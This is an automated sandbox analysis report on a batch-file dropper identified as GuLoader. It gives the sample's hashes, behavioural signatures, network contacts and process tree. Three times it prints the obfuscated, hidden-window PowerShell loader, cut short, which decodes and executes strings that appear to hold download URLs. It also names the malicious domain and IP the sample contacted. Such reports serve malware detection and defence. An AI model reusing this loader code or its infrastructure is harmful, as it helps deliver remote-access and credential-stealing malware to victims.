Windows Analysis Report
ORDER AND CATALOG 01.bat

Overview

General Information

Sample name: ORDER AND CATALOG 01.bat
Analysis ID: 1562494
MD5: 48eb61ad0c88221857d8cf3e96d58525
SHA1: 724b144e7bbabd011ca04d0d140ede4e47e7ec71
SHA256: fa9838f5471d4c21d2f8a2f6def009de4bcfad8e5794cc0be33b31e11c5d8fb9
Infos:

Detection

GuLoader
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected GuLoader
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Source: unknown HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: cohabitais.ru.com
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7526
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7526
Source: unknown Process created: Commandline size = 7550
Source: classification engine Classification label: mal60.troj.winBAT@8/7@1/38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Suspendibility.Lum
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2t3exdl0.jae.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
